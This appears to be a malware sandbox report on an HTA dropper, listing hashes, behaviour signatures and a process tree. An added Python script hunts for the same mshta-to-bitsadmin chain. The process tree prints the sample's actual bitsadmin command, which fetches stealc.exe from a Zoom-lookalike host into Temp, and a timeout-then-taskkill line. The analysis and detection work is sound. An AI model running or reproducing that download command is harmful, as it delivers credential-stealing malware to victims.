Analysis

  • max time kernel
    1379s
  • max time network
    1218s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-11-2024 00:19

General

  • Target

    xyz.hta

  • Size

    74KB

  • MD5

    acfba6ff2e80e0ebc80df9e7d326337c

  • SHA1

    fe28d5756815fdac31a744a2f11c075f5b1892bc

  • SHA256

    92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138

  • SHA512

    2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00

  • SSDEEP

    768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Download via BitsAdmin 1 TTPs 4 IoCs
  • Detected potential entity reuse from brand GOOGLE.
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Delays execution with timeout.exe 4 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2760
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        PID:940
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2788
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
    PID:2840
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0xc4
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2152
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1156
  • C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:2416
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        PID:928
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:1584
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.vbs"
    1⤵
    PID:1484
  • C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2084
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:1992
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        PID:1100
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x498
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1952
  • C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2152
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:1172
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /PID
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        PID:2488
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:1672
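The tree above shows the pattern a hunt rule should key on: a script host (mshta.exe launched on xyz.hta) spawning bitsadmin.exe to pull stealc.exe from a Zoom-lookalike host into the user's Temp directory, with a sibling cmd.exe that sleeps via timeout and then calls taskkill. The following is an added example for this report, not part of the sandbox output or of the sample: it replays constructed process records copied from the tree (PIDs and command lines are the report's; parent links follow the depth markers) through detection logic for that chain. The pid/ppid/image/cmd record layout and the small BRANDS allowlist are assumptions made for illustration.

```python
"""Hunt for the mshta.exe -> bitsadmin.exe download chain from this report.

Added example: EVENTS is constructed from the process tree in the report.
The pid/ppid/image/cmd layout is an assumption, not a real EDR schema.
"""
import ntpath
import re
from urllib.parse import urlparse

EVENTS = [  # constructed from the report; ppid 0 = no parent recorded
    {"pid": 2124, "ppid": 0, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\xyz.hta"'},
    {"pid": 2904, "ppid": 2124, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID'},
    {"pid": 2760, "ppid": 2904, "image": r"C:\Windows\SysWOW64\timeout.exe",
     "cmd": "timeout /t 30 /nobreak"},
    {"pid": 940, "ppid": 2904, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmd": "taskkill /F /PID"},
    {"pid": 2788, "ppid": 2124, "image": r"C:\Windows\SysWOW64\bitsadmin.exe",
     "cmd": r'"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download '
            r"/priority foreground https://us18web-zoom.us/stealc.exe "
            r"C:\Users\Admin\AppData\Local\Temp\stealc.exe"},
    {"pid": 1484, "ppid": 0, "image": r"C:\Windows\System32\WScript.exe",
     "cmd": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xyz.vbs"'},
]

# Script/LOLBin hosts that should not normally be the parent of a BITS download.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe"}
# Assumption for illustration: brand token -> the domain that legitimately owns it.
BRANDS = {"zoom": "zoom.us", "google": "google.com"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def ancestors(events, pid):
    """Parent chain of pid, nearest first, as lowercase image basenames."""
    idx = {e["pid"]: e for e in events}
    chain, seen = [], set()
    cur = idx.get(pid)
    while cur and cur["ppid"] in idx and cur["ppid"] not in seen:
        seen.add(cur["ppid"])  # guard: PID reuse must not turn the walk into a loop
        cur = idx[cur["ppid"]]
        chain.append(ntpath.basename(cur["image"]).lower())
    return chain


def parse_bitsadmin(cmd):
    """Extract URL, host and local destination from a bitsadmin transfer job.

    Returns None for command lines that move no file (e.g. /list). A destination
    with spaces would need real quote handling; the report's path has none.
    """
    flags = {t.lower() for t in cmd.split() if t.startswith("/")}
    if not flags & {"/transfer", "/addfile"}:
        return None
    m = URL_RE.search(cmd)
    if not m:
        return None
    url = m.group(0)
    rest = cmd[m.end():].split()  # in /transfer syntax the local path follows the URL
    return {"url": url, "host": (urlparse(url).hostname or "").lower(),
            "dest": rest[0] if rest else None}


def brand_lookalike(host, brands=BRANDS):
    """True if host carries a brand token but is not under the brand's own domain."""
    host = host.lower()
    return any(token in host and host != legit and not host.endswith("." + legit)
               for token, legit in brands.items())


def hunt(events):
    """Flag BITS downloads launched by script hosts (with extra reasons for a
    Temp-dropped .exe and a lookalike host) and the timeout-then-taskkill cmd."""
    findings = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        if name == "bitsadmin.exe":
            job = parse_bitsadmin(e["cmd"])
            if job is None:
                continue
            reasons = []
            chain = ancestors(events, e["pid"])
            if chain and chain[0] in SCRIPT_HOSTS:
                reasons.append("parent is script host " + chain[0])
            dest = (job["dest"] or "").lower()
            if dest.endswith(".exe") and "\\temp\\" in dest:
                reasons.append("drops an executable into Temp")
            if brand_lookalike(job["host"]):
                reasons.append("brand-lookalike host " + job["host"])
            if reasons:
                findings.append({"rule": "bits_download", "pid": e["pid"],
                                 "url": job["url"], "reasons": reasons})
        elif name == "cmd.exe":
            low = e["cmd"].lower()
            if "timeout" in low and "taskkill" in low:
                findings.append({"rule": "delayed_taskkill", "pid": e["pid"],
                                 "reasons": ["timeout followed by taskkill"]})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["rule"], f["pid"], "; ".join(f["reasons"]))
```

Run against the constructed records, `hunt` reports the bitsadmin.exe child of mshta.exe (PID 2788) with all three reasons and the cmd.exe wrapper (PID 2904) for the delay-then-kill pattern; the plain `timeout.exe` and `taskkill.exe` children are not flagged on their own, since each is benign in isolation and only the combination under a script host is the signal. Real telemetry should feed the same functions from Sysmon Event ID 1 or an EDR process-creation stream rather than this hand-built list.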

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

        Filesize

        854B

        MD5

        e935bc5762068caf3e24a2683b1b8a88

        SHA1

        82b70eb774c0756837fe8d7acbfeec05ecbf5463

        SHA256

        a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

        SHA512

        bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

        Filesize

        1KB

        MD5

        04aa1b25f53682aa1f27b48d0115d3c5

        SHA1

        20f5ab3031f8d17a834977341eb8d62576286625

        SHA256

        0630fe3c74cf55473780bdcb0faa1f8c3c1be86375341d2fd143ee8722dcd663

        SHA512

        7e1da3066e73145782a00fd77f3b6be1c494c7f866785995065348bd6a0cf6e263e2335b723158eeb1edfef3658ab1c980f7a6dd5830055fc37d4a1f72616c2c

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7

        Filesize

        472B

        MD5

        2268d17aa64cee418bc4659167c367ef

        SHA1

        42493d1b9f13b2a21fddb5d238ac2ca4b0fa6c5d

        SHA256

        d5ee56d6bc6d33a989917fdf25e637540c988037d55970b7261fa4f5b0252081

        SHA512

        9608c7d2af9f1cfdc577cc644b3f5d1af178415148f956b1c825316d2eb4140180d5535aa79864584f878e8c2b1e31f2325ebad6e6efa2b310eac4c7544e040f

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

        Filesize

        170B

        MD5

        8e638f905b22c941e43941d54e56ef42

        SHA1

        2799ec6b6ead279e165f718c236e0649d2ed96df

        SHA256

        d4394040a676ed7791359efd53b5ff72e74f26d96037f2647711e19eab8af930

        SHA512

        3b7caeed3b7c0f0db94065a160d090407fd9ca8b0f07c4d01854325a6a63a02d20a655c75aa499d144d15d60f76f84d6af253087e08a33fc051dbd6e8c8c8b79

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

        Filesize

        410B

        MD5

        95f03d54f3259a681869929295aae4cc

        SHA1

        e9c465f1ba7597f1a4db00fc96eb1911dfb10896

        SHA256

        0f9c33bab4e9c75bc27c5fc02c5430f985074498e5d6bce83a4c4d65aae5e218

        SHA512

        31c8e774c7d5b22df22f5845ffae0a18cfec5381f8a41bb6cd2022ef92fc800f1f9d0ffa16726a1eced781d425edc7a17fb021b38bd94ee1f24c14b8e2b72fea

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        342B

        MD5

        a965169d2b906b67f0d0297ca17cd0db

        SHA1

        9fdd69dde7399cbacc73988fa88ddba1752c622b

        SHA256

        bf2c009c9e186e7a509ec0d721ccfe89e025138799841db85a8438714a22b2bc

        SHA512

        865163ee76dc66afe63ee82d028dd993933c63576c2da167f914247897c0e71d7a4e5e3bd4b1ac02de05a89ec0edd0f59ce1acf848546c16a2dc5c6ea9977333

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7

        Filesize

        398B

        MD5

        14e9364b51f92e4ed4ea6e131e79d44c

        SHA1

        92485cdef664f6ca7fd40dbbc377dc3fe4f698d5

        SHA256

        90b090e36a3910ef39ea699c36b54895458584143d44f219bbd08001edbb60a8

        SHA512

        1e6ac371fc77b04dc9a080bab61a74d8c0186c9d598557c9f9956322ee095cce6a5ab3ad9c43f736386ccd13f0b084d4c82a8c6509751067adbed9a5e684097f

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        242B

        MD5

        d1aba87a975bad9ab490397af6a4503b

        SHA1

        791bb1ba5f7c6522838aa293f51c3e3076d4338f

        SHA256

        38656b43cb92e6a7128d8cb7c5c48e9142af7b6ca3876a65cd655496443db93f

        SHA512

        68de5451bbcdf79a029f7ee104607b83bd51f0fde80d9610b5a7a6bc80c0046342866782e87d0a0263863dd0d1a19386ae756b7dec09f6d85ce51933170a798c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\favicon[1].ico

        Filesize

        5KB

        MD5

        f3418a443e7d841097c714d69ec4bcb8

        SHA1

        49263695f6b0cdd72f45cf1b775e660fdc36c606

        SHA256

        6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

        SHA512

        82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

      • C:\Users\Admin\AppData\Local\Temp\Cab1297.tmp

        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      • C:\Users\Admin\AppData\Local\Temp\Tar7F3F.tmp

        Filesize

        181KB

        MD5

        4ea6026cf93ec6338144661bf1202cd1

        SHA1

        a1dec9044f750ad887935a01430bf49322fbdcb7

        SHA256

        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

        SHA512

        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      • memory/1156-25-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1156-24-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1156-23-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB